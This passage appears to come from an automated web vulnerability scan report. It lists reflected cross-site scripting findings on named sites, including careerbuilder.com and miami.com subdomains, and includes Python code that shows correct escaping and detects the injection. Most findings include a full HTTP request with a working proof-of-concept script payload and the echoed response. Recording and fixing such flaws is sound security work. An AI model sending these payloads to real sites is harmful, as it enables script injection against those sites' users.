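    """Emit value as a JavaScript string literal that cannot end early.
    json.dumps quotes the string and escapes backslashes, double quotes, control
    characters and (with the default ensure_ascii) every non-ASCII character,
    U+2028/U+2029 included; '<', '>' and '&' are escaped on top so the literal can
    neither close the enclosing <script> block nor be reinterpreted as markup."""
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_register_url_fixed(lr: str) -> str:
    """Fixed rendering: URL-encode the value for the query string it sits in, then
    emit the whole URL through js_string_literal()."""
    url = REGISTER_BASE + quote(lr, safe="") + "&ff=21"
    return "CB.AJAX.Login._registerURL = " + js_string_literal(url) + ";"


def js_segments(line: str) -> list:
    """Minimal tokenizer for one JavaScript statement: splits it into ('str', text)
    and ('code', text) segments, honouring backslash escapes inside '...' and "..."
    literals. Enough to tell whether a reflected value stayed inside one literal."""
    segments, buf = [], []
    quote_char = None
    i = 0
    while i < len(line):
        c = line[i]
        if quote_char:
            if c == "\\" and i + 1 < len(line):
                buf.append(line[i:i + 2])
                i += 2
                continue
            if c == quote_char:
                segments.append(("str", "".join(buf)))
                buf, quote_char = [], None
            else:
                buf.append(c)
        elif c in "'\"":
            if buf:
                segments.append(("code", "".join(buf)))
            buf, quote_char = [], c
        else:
            buf.append(c)
        i += 1
    if buf:
        segments.append(("unterminated" if quote_char else "code", "".join(buf)))
    return segments


def injected_code(line: str) -> list:
    """Code segments that sit between two string literals: exactly what a
    quote-break-quote payload such as '-alert(1)-' produces."""
    segs = js_segments(line)
    return [text for k, (kind, text) in enumerate(segs)
            if kind == "code" and 0 < k < len(segs) - 1
            and segs[k - 1][0] == "str" and segs[k + 1][0] == "str"]


PAYLOAD = "cbcb_mh7c4b0'-alert(1)-'e1cb828b728"   # lr value from the request below

if __name__ == "__main__":
    vulnerable = render_register_url(PAYLOAD)
    fixed = render_register_url_fixed(PAYLOAD)
    print(vulnerable, "->", injected_code(vulnerable))
    print(fixed, "->", injected_code(fixed))
```

The vulnerable line tokenizes as string, code, string, and the code in the middle is the injected -alert(1)-; the fixed line is one string literal with nothing between, because the quote was percent-encoded before it ever reached the script block.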

Request

GET /np.ic/Florida_Miami/?lr=cbcb_mh7c4b0'-alert(1)-'e1cb828b728&SiteID=cbcb_mh044 HTTP/1.1
Host: nonprofit.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193671
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=d3514a0dd6ee4dd987d69599015f5627-343071191-w2-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65082533C0B6A15006E7BC1B42D76A4BDB01E298DFB14A0354963421DD88C93932E779431AB1D93ACE6; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:11 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:11 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR2
Date: Sun, 14 Nov 2010 22:33:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh7c4b0'-alert(1)-'e1cb828b728&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.188. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125d3"><script>alert(1)</script>70febfd0c58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?125d3"><script>alert(1)</script>70febfd0c58=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAA1BwAA6Vf9zWhAqhs9UEWZy8ydVA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:27:59 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:28:00 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:27:59 GMT
Content-Length: 43681


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?125d3"><script>alert(1)</script>70febfd0c58=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

2.189. http://pd.miami.com/sp [aff parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the aff request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cefd'><script>alert(1)</script>08ecacb8cdf was submitted in the aff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=&aff=11097cefd'><script>alert(1)</script>08ecacb8cdf&keywords=&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008834; Expires=Mon, 14-Nov-2011 22:32:00 GMT; Path=/
Set-Cookie: JSESSIONID=38FCB2DA207BCBB9D35AA629320C5968; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:32:02 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>MiamiHerald.com Search</title>
       <!-- No include URL entered -->
       <
...[SNIP]...
<a class='on-page' href='/sp?aff=11097cefd'><script>alert(1)</script>08ecacb8cdf&skin=&submit=Go&keywords=&start=1'>
...[SNIP]...

2.190. http://pd.miami.com/sp [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload a29ab<script>alert(1)</script>7d509c47700 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=&aff=1109&keywords=a29ab<script>alert(1)</script>7d509c47700&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008847; Expires=Mon, 14-Nov-2011 22:32:03 GMT; Path=/
Set-Cookie: JSESSIONID=E2FDD3163D3ACCA75F1716C8CD671BE4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:32:02 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
       <title>a29ab&lt;script&gt;a
...[SNIP]...
<span class="bold-font">a29ab<script>alert(1)</script>7d509c47700</span>
...[SNIP]...

2.191. http://pd.miami.com/sp [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f284b"><script>alert(1)</script>34bce5358bd was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=&aff=1109&keywords=f284b"><script>alert(1)</script>34bce5358bd&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008843; Expires=Mon, 14-Nov-2011 22:32:03 GMT; Path=/
Set-Cookie: JSESSIONID=4C6CA1184F2F4D6429BCFB2F707F8A1B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:32:02 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
       <title>f284b&quot;&gt;&lt;s
...[SNIP]...
<input id="keywords" type="text" name="keywords" value="f284b"><script>alert(1)</script>34bce5358bd" >
...[SNIP]...

2.192. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8af6"><script>alert(1)</script>0b02c8bd5b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?e8af6"><script>alert(1)</script>0b02c8bd5b8=1 HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008771; Expires=Mon, 14-Nov-2011 22:31:45 GMT; Path=/
Set-Cookie: JSESSIONID=5F4E76F4A7975B2D912E6DDDABD693EC; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:31:53 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>MiamiHerald.com Search</title>
       <!-- No include URL entered -->
       <
...[SNIP]...
<a href="http://pd.miami.com/sp?skin=&aff=1100&keywords=&e8af6"><script>alert(1)</script>0b02c8bd5b8=1&">
...[SNIP]...

2.193. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a68d'><script>alert(1)</script>2a247e32006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?5a68d'><script>alert(1)</script>2a247e32006=1 HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008817; Expires=Mon, 14-Nov-2011 22:31:57 GMT; Path=/
Set-Cookie: JSESSIONID=623F113F2B767DD27302847C91959B89; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:31:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>MiamiHerald.com Search</title>
       <!-- No include URL entered -->
       <
...[SNIP]...
<a class='on-page' href='/sp?aff=&5a68d'><script>alert(1)</script>2a247e32006=1&5a68d'>
...[SNIP]...

2.194. http://pd.miami.com/sp [skin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the skin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb94"><script>alert(1)</script>7c71531038e was submitted in the skin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=abb94"><script>alert(1)</script>7c71531038e&aff=1109&keywords=&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008725; Expires=Mon, 14-Nov-2011 22:31:36 GMT; Path=/
Set-Cookie: JSESSIONID=5E3C42A7A8E3B1A057FB8D90D6456A77; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:31:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>Local Directory > Miami, FL > Miami Herald</title>
       
           
               <link rel="StyleSheet" href="/sf_frameworks/yp/css/screen.jsp?skin=abb94"><script>alert(1)</script>7c71531038e" type="text/css"/>
...[SNIP]...

2.195. http://pd.miami.com/sp [skin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the skin request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd1a7'><script>alert(1)</script>6a21073105a was submitted in the skin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=bd1a7'><script>alert(1)</script>6a21073105a&aff=1109&keywords=&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008731; Expires=Mon, 14-Nov-2011 22:31:38 GMT; Path=/
Set-Cookie: JSESSIONID=4B5FA7C0F6A9F5500F6AB02D2769F0E3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:31:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>Local Directory > Miami, FL > Miami Herald</title>
       
           
               <li
...[SNIP]...
<input type='hidden' name='skin' value='bd1a7'><script>alert(1)</script>6a21073105a'/>
...[SNIP]...

2.196. http://retail.careerbuilder.com/rt.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://retail.careerbuilder.com
Path:   /rt.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33483"%20a%3db%209e634a2ad91 was submitted in the lr parameter. This input was echoed as 33483" a=b 9e634a2ad91 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rt.ic/Florida_Miami/?lr=cbcb_mh33483"%20a%3db%209e634a2ad91&SiteID=cbcb_mh045 HTTP/1.1
Host: retail.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196457
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=4457d6fa83344a578fb8e489d659276d-343071183-XE-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650A3EF5BFA08B152085FF5EB5256808D63408F4E9A5B5C6850C79095234B5F2A3EDC57BB78FC777114; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:03 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:03 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR45
Date: Sun, 14 Nov 2010 22:33:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh33483" a=b 9e634a2ad91" />
...[SNIP]...

2.197. http://retail.careerbuilder.com/rt.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://retail.careerbuilder.com
Path:   /rt.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59826'-alert(1)-'b0e1b29c015 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rt.ic/Florida_Miami/?lr=cbcb_mh59826'-alert(1)-'b0e1b29c015&SiteID=cbcb_mh045 HTTP/1.1
Host: retail.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196717
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=cb054ad5c25e4f7c8fe17a48f1dee91c-343071214-wc-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65028A8C4478E20C154059119D0921DD53C8E8B668187685AE991E973471DDFBE77BEACC4A7A1B8CD36; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:33 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:34 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR13
Date: Sun, 14 Nov 2010 22:33:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh59826'-alert(1)-'b0e1b29c015&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.198. http://sales-marketing.careerbuilder.com/sm.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-marketing.careerbuilder.com
Path:   /sm.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b023'-alert(1)-'384c97332ed was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sm.ic/Florida_Miami/?lr=cbcb_mh5b023'-alert(1)-'384c97332ed&SiteID=cbcb_mh046 HTTP/1.1
Host: sales-marketing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199874
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=1ada416b55864b70b364400fe1ec4bd2-343071233-wx-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65088C2B54C90EA381232F5A1B73A74E39F55234E2E04AEE9D9E243F37AEFDF837155E0C8F4E2A2701C; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:52 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:53 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR34
Date: Sun, 14 Nov 2010 22:33:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh5b023'-alert(1)-'384c97332ed&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.199. http://sales-marketing.careerbuilder.com/sm.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales-marketing.careerbuilder.com
Path:   /sm.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71567"%20a%3db%2037dba5a01fa was submitted in the lr parameter. This input was echoed as 71567" a=b 37dba5a01fa in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sm.ic/Florida_Miami/?lr=cbcb_mh71567"%20a%3db%2037dba5a01fa&SiteID=cbcb_mh046 HTTP/1.1
Host: sales-marketing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199294
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=2dec5cb744574f9c9598166721519d59-343071203-wq-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B7174C4F3D987D1FF16F084FF840B84E44E723C892C16C31E97843014090580DC1E4169D092792D0; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:23 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:23 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR27
Date: Sun, 14 Nov 2010 22:33:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh71567" a=b 37dba5a01fa" />
...[SNIP]...

2.200. http://search.miami.com/search-bin/search.pl.cgi [fields parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.miami.com
Path:   /search-bin/search.pl.cgi

Issue detail

The value of the fields request parameter is copied into the HTML document as plain text between tags. The payload 91cc6<script>alert(1)</script>88b28ce8f1f was submitted in the fields parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search-bin/search.pl.cgi?product=movies&live_template=http%3A%2F%2Fmovies.miami.com%2Fsearch%2Fv-sr%2Findex.html&collection=ENDECA_INDEX&fields=91cc6<script>alert(1)</script>88b28ce8f1f&preview_template=http%3A%2F%2Fmovies-preview.miami.com%2Fsearch%2Fv-sr%2Findex.html&results_per_page=500&prop_expose_refs=0&sf_movies_showtime_dt=&sf_meta_domain=www.miamiherald.com&sort=movies_theater_geocode%2Cmovies_theater_name%2Cmovies_movie_title%2Cmovies_showtime_dt&prop_geo_radius=20&sf_movies_showtimes=&sf_movies_theater_geocode=Miami&op.x=24&op.y=9&op=Search HTTP/1.1
Host: search.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:34:43 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Expires: Sat, 13 Nov 2010 22:34:43 GMT
Mi-app-host: rsds009p
Content-Type: text/html; charset=ISO-8859-1
X-Cache: MISS from search.miami.com
Connection: close
Content-Length: 518

<h1>Search Error</h1>
<b>Could not retrieve Error Template.</b><br>
Error template:
<br>
error_template not set.

<p>
<b>Search Error(s)</b><br>
NM::Search::SEI::Connection: ERROR: Unable to parse query string: [search SOLR for 91cc6<script>alert(1)</script>88b28ce8f1f where meta_domain = "www.miamiherald.com" and meta_product = "movies" and movies_theater_geocode = "Miami" order by movies_theater_geocode,movies_theater_name,movies_movie_title,movies_showtime_dt lim
...[SNIP]...

2.201. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tlight2-niqwf.aacehardware.info
Path:   /tag/Special+Sales+Bear+bear/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84964"><script>alert(1)</script>ffc48037882 was submitted in the REST URL parameter 2. This input was echoed as 84964\"><script>alert(1)</script>ffc48037882 in the application's response. The backslash that the application places in front of the quotation mark has no escaping meaning in HTML, so the quote still terminates the attribute value and the injected tags are parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
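The \" in the echoed value deserves a closer look: the application escaped the quotation mark with a backslash (addslashes()-style escaping is one plausible source, though the report does not identify it), and a backslash does nothing inside an HTML attribute, where only a character reference such as &quot; neutralises a quote. The check below, added here and not part of the report, feeds the reflected line from this issue to Python's HTML tokenizer and lists the start tags it produces, then does the same for a constructed rendering of the link with proper attribute encoding. render_tag_link and TAG_VALUE are the example's own.

```python
import html
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Records every start tag the tokenizer produces, with decoded attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def start_tags(fragment: str) -> list:
    """Parse fragment and return [(tag_name, {attr: value}), ...] in document order."""
    parser = TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def script_tags(fragment: str) -> list:
    """Names of all <script> start tags a parser would create from fragment."""
    return [tag for tag, _ in start_tags(fragment) if tag == "script"]


# Reflected line copied from the response of this issue. The backslash before the
# quote is what the application emitted; the tokenizer treats it as an ordinary
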